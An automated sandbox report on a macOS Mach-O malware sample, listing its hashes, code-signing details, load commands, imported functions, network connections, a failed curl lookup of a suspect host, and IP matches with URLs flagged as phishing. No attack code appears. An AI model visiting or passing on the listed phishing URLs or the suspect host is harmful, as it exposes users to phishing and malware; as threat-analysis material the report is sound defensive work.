	https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	152.199.4.44
	https://recouvrement-assurance.fr/LKeZL	Get hash	malicious	Unknown	Browse	152.199.24.185
	https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499fa	Get hash	malicious	HTMLPhisher	Browse	192.229.173.207
FASTLYUS	Play_NewMessage_17April2024_Audio.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2	Get hash	malicious	Unknown	Browse	151.101.194.208
	http://monacolife.net	Get hash	malicious	Unknown	Browse	151.101.12.159
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	185.199.110.133
	https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83c	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://librospy.com/	Get hash	malicious	Unknown	Browse	151.101.64.114
	https://scsang.cn/	Get hash	malicious	Unknown	Browse	151.101.12.157
	https://cvn7.sa.com/invoice.html?app=	Get hash	malicious	HTMLPhisher	Browse	151.101.52.193
	https://15ab0ot.pages.dev/	Get hash	malicious	PayPal Phisher	Browse	151.101.193.21
	https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728	Get hash	malicious	Unknown	Browse	151.101.66.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5c118da645babe52f060d0754256a73c	89.kk	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	Arc12645415	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	SME.dmg	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	3MVd1q7ygy.macho	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	https://www.flazio.com/server.html	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	https://pub.marq.com/Downloadiiii-Fileee/	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	todoist-setup.dmg	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	http://marketplace-item-details-98756222.zya.me	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	Diogenes	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199	Get hash	malicious	Unknown	Browse	151.101.131.6 151.101.195.6 17.248.193.16 151.101.67.6

Process:	/usr/bin/curl
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.651111449487769
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeX/8UniGdCSgOgcvRFNaA3YKVGh:Vz6ykymUe0bSc9cvRVm
MD5:	81F6B9B694BBADD68BAFF38716A1290E
SHA1:	570A457C8B101350A3DB0F489C3977E7B8852E62
SHA-256:	6E1DB63E25FBCC998A7326497F61DC15E67EC696153AAA473FE6B5A276A8E859
SHA-512:	D7CE37C8B6ECE36A1F47F3241C6C30E9E57845E3D24E551A88C47E524703E65D4C1AC18AAE86F0D137BB265FA1BD972B0B970FEC913F80CBDB2C29A630F4E1D4
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed.. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: api.appsreforoma.com.

Static File Info

General

File type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|BINDS_TO_WEAK\|PIE>
Entropy (8bit):	5.933933117666083
TrID:	Mac OS X Mach-O 64-bit Intel executable (4008/2) 50.02% Mac OS X Mach-O 64-bit executable (little-endian) (4004/1) 49.98%
File name:	malw_sampl
File size:	47'222 bytes
MD5:	d3e39930bca4c4b57f6e1f241f0a31c8
SHA1:	ca71f4ee36076497b3989e61352da70fa4dfca8b
SHA256:	02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a
SHA512:	b2b8812abc8551946018af4912d183a3b2cab4981526d8cd61fda90320eb4c882094d0fd9f0deaf62184c710f97bdff731f5943e80d90e9510b9d0af64f14abf
SSDEEP:	768:vKSrm5inFlv7aY1taE7A8sHlP/Tq80oTyq78WA76ZW0WAiJYD3ab8X:bFlWUtpc1/rAq78WA76ZW0WAimD3Kq
TLSH:	5B23291207755A11E9C095B472CA73B3CE22FA352EA1174B2792CA942FF7BF57B09206
File Content Preview:	..........................!.........H...__PAGEZERO..........................................................x...__TEXT...................`...............`......................__text..........__TEXT..................b:.....................................

CodeSign Information

["Executable=/Users/bernard/Desktop/malw_sampl","Identifier=com.K2IxiMJv6ltqvNdp9slXSQ","Format=Mach-O thin (x86_64)","CodeDirectory v=20200 size=506 flags=0x0(none) hashes=10+3 location=embedded","Hash type=sha256 size=32","CandidateCDHash sha1=5219baeb589d9658e548224448fb6b8a1745979c","CandidateCDHash sha256=df454b605f8cc435caaa81a338b72d48e2ff2d97","Hash choices=sha1,sha256","Page size=4096","CDHash=df454b605f8cc435caaa81a338b72d48e2ff2d97","Signature size=8923","Authority=Developer ID Application: Mitchell Penelope (49PT3G78ZF)","Authority=Developer ID Certification Authority","Authority=Apple Root CA","Timestamp=24 Jan 2018 at 02:03:12","Info.plist=not bound","TeamIdentifier=49PT3G78ZF","Sealed Resources=none","Internal requirements count=1 size=188"]

Static Mach Info

General Information for header 1
Endian:	little-endian
Size:	64-bit
Architecture:	x86_64
Filetype:	execute
Nbr. of load commands:	19
Entry point:	0x100001410

segment_64 load command - aggregated: 4

Name	Value
segname	__PAGEZERO
vmaddr	0x0
vmsize	0x100000000
fileoff	0x0
filesize	0x0
maxprot	0x0
initprot	0x0
nsects	0
flags	0x0

Name

Value

segname

__TEXT

vmaddr

0x100000000

vmsize

0x6000

fileoff

0x0

filesize

0x6000

maxprot

0x7

initprot

0x5

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__text	__TEXT	0x100001410	0x3A62	0x1410	6.06751562	4	0x0	0	0x80000400
__stubs	__TEXT	0x100004E72	0x192	0x4E72	3.35590512	1	0x0	0	0x80000400
__stub_helper	__TEXT	0x100005004	0x286	0x5004	4.28135719	2	0x0	0	0x80000400
__const	__TEXT	0x100005290	0x5A0	0x5290	7.40356224	4	0x0	0	0x0
__gcc_except_tab	__TEXT	0x100005830	0x694	0x5830	3.42401794	2	0x0	0	0x0
__cstring	__TEXT	0x100005EC4	0x6	0x5EC4	1.79248125	0	0x0	0	0x0
__unwind_info	__TEXT	0x100005ECC	0x130	0x5ECC	4.21279161	2	0x0	0	0x0

Name

Value

segname

__DATA

vmaddr

0x100006000

vmsize

0x1000

fileoff

0x6000

filesize

0x1000

maxprot

0x7

initprot

0x3

nsects

flags

0x0

Datas

sectname	segname	addr	size	offset	entropy	align	reloff	nreloc	flags
__nl_symbol_ptr	__DATA	0x100006000	0x10	0x6000	-0.00000000	3	0x0	0	0x0
__got	__DATA	0x100006010	0x48	0x6010	-0.00000000	3	0x0	0	0x0
__la_symbol_ptr	__DATA	0x100006058	0x218	0x6058	2.36600904	3	0x0	0	0x0
__const	__DATA	0x100006270	0x1C8	0x6270	2.01621718	4	0x0	0	0x0

Name	Value
segname	__LINKEDIT
vmaddr	0x100007000
vmsize	0x5000
fileoff	0x7000
filesize	0x4850
maxprot	0x7
initprot	0x1
nsects	0
flags	0x0

dyld_info_only load command - aggregated: 1

Name	Value
rebase_off	28672
rebase_size	32
bind_off	28704
bind_size	1144
weak_bind_off	29848
weak_bind_size	88
lazy_bind_off	29936
lazy_bind_size	2088
export_off	32024
export_size	32

symtab load command - aggregated: 1

Name	Value
symoff	32112
nsyms	96
stroff	34228
strsize	2784

dysymtab load command - aggregated: 1

Name	Value
ilocalsym	0
nlocalsym	0
iextdefsym	0
nextdefsym	1
iundefsym	1
nundefsym	95
tocoff	0
ntoc	0
modtaboff	0
nmodtab	0
extrefsymoff	0
nextrefsyms	0
indirectsymoff	33648
nindirectsyms	145
extreloff	0
nextrel	0
locreloff	0
nlocrel	0

load_dylinker load command - aggregated: 1

Name	Value

uuid load command - aggregated: 1

Name	Value
uuid	55dff74a-95f4-310a-add8-2016c1e36991

version_min_macosx load command - aggregated: 1

Name	Value
version	10.9.0
sdk	10.13.0

source_version load command - aggregated: 1

Name	Value
path	0.0.0.0.0

main load command - aggregated: 1

Name	Value

load_dylib load command - aggregated: 4

Name

Value

compatibility_version

1.0.0

current_version

400.9.0

timestamp

1970-01-01

Datas

/usr/lib/libc++.1.dylib

Name

Value

compatibility_version

1.0.0

current_version

50.0.0

timestamp

1970-01-01

Datas

/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices

Name

Value

compatibility_version

1.0.0

current_version

1252.0.0

timestamp

1970-01-01

Datas

/usr/lib/libSystem.B.dylib

Name

Value

compatibility_version

150.0.0

current_version

1443.13.0

timestamp

1970-01-01

Datas

/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

function_starts load command - aggregated: 1

Name	Value
dataoff	32056
datasize	56

data_in_code load command - aggregated: 1

Name	Value
dataoff	32112
datasize	0

code_signature load command - aggregated: 1

Name	Value
dataoff	37024
datasize	10160

Symbols

Name	Category	Origin	Segment Name	Bind Address	Library Name
__mh_execute_header	EXTERNAL	LC_SYMTAB
_CFBundleCopyBundleURL	UNDEFINED	LC_SYMTAB	__DATA	0x100006058	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFBundleGetMainBundle	UNDEFINED	LC_SYMTAB	__DATA	0x100006060	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFRelease	UNDEFINED	LC_SYMTAB	__DATA	0x100006068	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFStringGetCString	UNDEFINED	LC_SYMTAB	__DATA	0x100006070	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFStringGetCStringPtr	UNDEFINED	LC_SYMTAB	__DATA	0x100006078	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFStringGetLength	UNDEFINED	LC_SYMTAB	__DATA	0x100006080	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFURLCopyPath	UNDEFINED	LC_SYMTAB	__DATA	0x100006088	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_CFURLCopyResourcePropertyForKey	UNDEFINED	LC_SYMTAB	__DATA	0x100006090	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_TransformProcessType	UNDEFINED	LC_SYMTAB	__DATA	0x100006098	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
__Unwind_Resume	UNDEFINED	LC_SYMTAB	__DATA	0x1000060A0	/usr/lib/libSystem.B.dylib
__ZNKSt3__120__vector_base_commonILb1EE20__throw_length_errorEv	UNDEFINED	LC_SYMTAB	__DATA	0x1000060A8	/usr/lib/libc++.1.dylib
__ZNKSt3__120__vector_base_commonILb1EE20__throw_out_of_rangeEv	UNDEFINED	LC_SYMTAB	__DATA	0x1000060B0	/usr/lib/libc++.1.dylib
__ZNKSt3__121__basic_string_commonILb1EE20__throw_length_errorEv	UNDEFINED	LC_SYMTAB	__DATA	0x1000060B8	/usr/lib/libc++.1.dylib
__ZNKSt3__16locale9has_facetERNS0_2idE	UNDEFINED	LC_SYMTAB	__DATA	0x1000060C0	/usr/lib/libc++.1.dylib
__ZNKSt3__16locale9use_facetERNS0_2idE	UNDEFINED	LC_SYMTAB	__DATA	0x1000060C8	/usr/lib/libc++.1.dylib
__ZNKSt3__18ios_base6getlocEv	UNDEFINED	LC_SYMTAB
__ZNKSt9exception4whatEv	UNDEFINED	LC_SYMTAB
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKc	UNDEFINED	LC_SYMTAB	__DATA	0x1000060D0	/usr/lib/libc++.1.dylib
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm	UNDEFINED	LC_SYMTAB	__DATA	0x1000060D8	/usr/lib/libc++.1.dylib
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7reserveEm	UNDEFINED	LC_SYMTAB	__DATA	0x1000060E0	/usr/lib/libc++.1.dylib
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_	UNDEFINED	LC_SYMTAB	__DATA	0x1000060E8	/usr/lib/libc++.1.dylib
__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_mmRKS4_	UNDEFINED	LC_SYMTAB	__DATA	0x1000060F0	/usr/lib/libc++.1.dylib
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006290	/usr/lib/libc++.1.dylib
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006288	/usr/lib/libc++.1.dylib
__ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED2Ev	UNDEFINED	LC_SYMTAB	__DATA	0x1000060F8	/usr/lib/libc++.1.dylib
__ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE3putEc	UNDEFINED	LC_SYMTAB
__ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE5flushEv	UNDEFINED	LC_SYMTAB
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5uflowEv	UNDEFINED	LC_SYMTAB	__DATA	0x100006390	/usr/lib/libc++.1.dylib
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsgetnEPcl	UNDEFINED	LC_SYMTAB	__DATA	0x100006380	/usr/lib/libc++.1.dylib
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsputnEPKcl	UNDEFINED	LC_SYMTAB	__DATA	0x1000063A0	/usr/lib/libc++.1.dylib
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE9showmanycEv	UNDEFINED	LC_SYMTAB	__DATA	0x100006378	/usr/lib/libc++.1.dylib
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEEC2Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006100	/usr/lib/libc++.1.dylib
__ZNSt3__115basic_streambufIcNS_11char_traitsIcEEED2Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006108	/usr/lib/libc++.1.dylib
__ZNSt3__119__shared_weak_count16__release_sharedEv	UNDEFINED	LC_SYMTAB	__DATA	0x100006110	/usr/lib/libc++.1.dylib
__ZNSt3__119__shared_weak_countD2Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006118	/usr/lib/libc++.1.dylib
__ZNSt3__14coutE	UNDEFINED	LC_SYMTAB
__ZNSt3__15ctypeIcE2idE	UNDEFINED	LC_SYMTAB
__ZNSt3__16localeC1ERKS0_	UNDEFINED	LC_SYMTAB	__DATA	0x100006120	/usr/lib/libc++.1.dylib
__ZNSt3__16localeD1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006128	/usr/lib/libc++.1.dylib
__ZNSt3__17codecvtIcc11__mbstate_tE2idE	UNDEFINED	LC_SYMTAB	__DATA	0x100006010	/usr/lib/libc++.1.dylib
__ZNSt3__18ios_base4initEPv	UNDEFINED	LC_SYMTAB	__DATA	0x100006130	/usr/lib/libc++.1.dylib
__ZNSt3__18ios_base5clearEj	UNDEFINED	LC_SYMTAB	__DATA	0x100006138	/usr/lib/libc++.1.dylib
__ZNSt3__19basic_iosIcNS_11char_traitsIcEEED2Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006140	/usr/lib/libc++.1.dylib
__ZNSt8bad_castC1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006148	/usr/lib/libc++.1.dylib
__ZNSt8bad_castD1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006018	/usr/lib/libc++.1.dylib
__ZNSt9exceptionD0Ev	UNDEFINED	LC_SYMTAB
__ZNSt9exceptionD1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x100006150	/usr/lib/libc++.1.dylib
__ZSt9terminatev	UNDEFINED	LC_SYMTAB	__DATA	0x100006158	/usr/lib/libc++.1.dylib
__ZTINSt3__113basic_istreamIcNS_11char_traitsIcEEEE	UNDEFINED	LC_SYMTAB	__DATA	0x1000063E0	/usr/lib/libc++.1.dylib
__ZTINSt3__115basic_streambufIcNS_11char_traitsIcEEEE	UNDEFINED	LC_SYMTAB	__DATA	0x1000063C0	/usr/lib/libc++.1.dylib
__ZTINSt3__119__shared_weak_countE	UNDEFINED	LC_SYMTAB	__DATA	0x100006430	/usr/lib/libc++.1.dylib
__ZTISt8bad_cast	UNDEFINED	LC_SYMTAB	__DATA	0x100006020	/usr/lib/libc++.1.dylib
__ZTISt9exception	UNDEFINED	LC_SYMTAB	__DATA	0x100006028	/usr/lib/libc++.1.dylib
__ZTVN10__cxxabiv120__si_class_type_infoE	UNDEFINED	LC_SYMTAB	__DATA	0x100006420	/usr/lib/libc++.1.dylib
__ZTVSt9exception	UNDEFINED	LC_SYMTAB	__DATA	0x100006030	/usr/lib/libc++.1.dylib
__ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev	UNDEFINED	LC_SYMTAB	__DATA	0x1000062B8	/usr/lib/libc++.1.dylib
__ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev	UNDEFINED	LC_SYMTAB	__DATA	0x1000062B0	/usr/lib/libc++.1.dylib
__ZdaPv	UNDEFINED	LC_SYMTAB	__DATA	0x100006160
__ZdlPv	UNDEFINED	LC_SYMTAB	__DATA	0x100006168
__Znam	UNDEFINED	LC_SYMTAB	__DATA	0x100006170
__Znwm	UNDEFINED	LC_SYMTAB	__DATA	0x100006178
___bzero	UNDEFINED	LC_SYMTAB	__DATA	0x100006180	/usr/lib/libSystem.B.dylib
___cxa_allocate_exception	UNDEFINED	LC_SYMTAB	__DATA	0x100006188	/usr/lib/libc++.1.dylib
___cxa_begin_catch	UNDEFINED	LC_SYMTAB	__DATA	0x100006190	/usr/lib/libc++.1.dylib
___cxa_end_catch	UNDEFINED	LC_SYMTAB	__DATA	0x100006198	/usr/lib/libc++.1.dylib
___cxa_get_exception_ptr	UNDEFINED	LC_SYMTAB	__DATA	0x1000061A0	/usr/lib/libc++.1.dylib
___cxa_rethrow	UNDEFINED	LC_SYMTAB	__DATA	0x1000061A8	/usr/lib/libc++.1.dylib
___cxa_throw	UNDEFINED	LC_SYMTAB	__DATA	0x1000061B0	/usr/lib/libc++.1.dylib
___gxx_personality_v0	UNDEFINED	LC_SYMTAB	__DATA	0x100006038	/usr/lib/libc++.1.dylib
___stack_chk_fail	UNDEFINED	LC_SYMTAB	__DATA	0x1000061B8	/usr/lib/libSystem.B.dylib
___stack_chk_guard	UNDEFINED	LC_SYMTAB	__DATA	0x100006040	/usr/lib/libSystem.B.dylib
_access	UNDEFINED	LC_SYMTAB	__DATA	0x1000061C0	/usr/lib/libSystem.B.dylib
_chmod	UNDEFINED	LC_SYMTAB	__DATA	0x1000061C8	/usr/lib/libSystem.B.dylib
_fclose	UNDEFINED	LC_SYMTAB	__DATA	0x1000061D0	/usr/lib/libSystem.B.dylib
_feof	UNDEFINED	LC_SYMTAB	__DATA	0x1000061D8	/usr/lib/libSystem.B.dylib
_fflush	UNDEFINED	LC_SYMTAB	__DATA	0x1000061E0	/usr/lib/libSystem.B.dylib
_fgets	UNDEFINED	LC_SYMTAB	__DATA	0x1000061E8	/usr/lib/libSystem.B.dylib
_fopen	UNDEFINED	LC_SYMTAB	__DATA	0x1000061F0	/usr/lib/libSystem.B.dylib
_fread	UNDEFINED	LC_SYMTAB	__DATA	0x1000061F8	/usr/lib/libSystem.B.dylib
_fseeko	UNDEFINED	LC_SYMTAB	__DATA	0x100006200	/usr/lib/libSystem.B.dylib
_ftello	UNDEFINED	LC_SYMTAB	__DATA	0x100006208	/usr/lib/libSystem.B.dylib
_fwrite	UNDEFINED	LC_SYMTAB	__DATA	0x100006210	/usr/lib/libSystem.B.dylib
_kCFURLVolumeURLKey	UNDEFINED	LC_SYMTAB	__DATA	0x100006048	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
_memcpy	UNDEFINED	LC_SYMTAB	__DATA	0x100006218	/usr/lib/libSystem.B.dylib
_memmove	UNDEFINED	LC_SYMTAB	__DATA	0x100006220	/usr/lib/libSystem.B.dylib
_mkdir	UNDEFINED	LC_SYMTAB	__DATA	0x100006228	/usr/lib/libSystem.B.dylib
_pclose	UNDEFINED	LC_SYMTAB	__DATA	0x100006230	/usr/lib/libSystem.B.dylib
_popen	UNDEFINED	LC_SYMTAB	__DATA	0x100006238	/usr/lib/libSystem.B.dylib
_snprintf	UNDEFINED	LC_SYMTAB	__DATA	0x100006240	/usr/lib/libSystem.B.dylib
_sprintf	UNDEFINED	LC_SYMTAB	__DATA	0x100006248	/usr/lib/libSystem.B.dylib
_strlen	UNDEFINED	LC_SYMTAB	__DATA	0x100006250	/usr/lib/libSystem.B.dylib
_system	UNDEFINED	LC_SYMTAB	__DATA	0x100006258	/usr/lib/libSystem.B.dylib
_uuid_generate_random	UNDEFINED	LC_SYMTAB	__DATA	0x100006260	/usr/lib/libSystem.B.dylib
_uuid_unparse	UNDEFINED	LC_SYMTAB	__DATA	0x100006268	/usr/lib/libSystem.B.dylib
dyld_stub_binder	UNDEFINED	LC_SYMTAB	__DATA	0x100006000	/usr/lib/libSystem.B.dylib

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 11:45:18.399475098 CEST	80	49346	192.229.211.108	192.168.11.12
Apr 19, 2024 11:45:18.400273085 CEST	49346	80	192.168.11.12	192.229.211.108
Apr 19, 2024 11:45:18.408508062 CEST	443	49345	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.408576965 CEST	443	49345	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.409255028 CEST	49345	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.424987078 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.425803900 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.427550077 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.430279970 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.589449883 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.591814041 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.591923952 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.591979980 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.592035055 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.592076063 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.593907118 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.593907118 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.594001055 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.594356060 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.602334976 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.636116982 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.691232920 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.692198038 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.696751118 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.761454105 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.761513948 CEST	443	49347	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.762214899 CEST	49347	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.795105934 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.795829058 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.796669960 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.955625057 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.957479954 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.957592964 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.957603931 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.957616091 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.957623959 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:18.958842039 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.958889008 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.958889008 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.959902048 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:18.960212946 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960472107 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960597992 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960652113 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960663080 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960721016 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.960772038 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:18.962387085 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.962541103 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.962632895 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.963398933 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:18.997323036 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.015444994 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.022746086 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.156133890 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.156142950 CEST	443	49350	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.156764984 CEST	49350	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.182142973 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.182740927 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.184223890 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.278888941 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.279156923 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.279167891 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.280600071 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.280680895 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.303395033 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.303668976 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.303917885 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.303987026 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.304390907 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.343600035 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.345545053 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.345556974 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.345654964 CEST	443	49352	151.101.131.6	192.168.11.12
